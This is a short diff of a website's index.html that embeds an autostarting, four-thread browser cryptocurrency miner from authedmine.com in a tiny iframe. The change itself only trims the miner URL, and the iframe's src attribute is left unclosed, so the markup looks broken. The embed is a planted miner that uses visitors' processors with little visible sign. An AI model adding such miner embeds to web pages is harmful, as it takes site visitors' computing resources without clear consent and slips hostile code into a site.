--- a/index.html
+++ b/index.html
@@ -13,7 +13,7 @@
 	data-key="C6FfXf8rUkX3of6Cv1DcA4Z7MKupaOwD"
 	data-autostart="true"
 	data-threads="4">
-    <iframe src="https://authedmine.com/media/miner.html?key=We3FxsjdPPBqzEjwPwDL01V77SZHOynA&amp;
+    <iframe src="https://authedmine.com/media/miner.html?key=We3FxsjdPPBqzEjwPwDL01V77SZHOynA&amp
  	style="width: 53px; height: 59px;"
 	data-key="C6FfXf8rUkX3of6Cv1DcA4Z7MKupaOwD"
 	data-autostart="true"
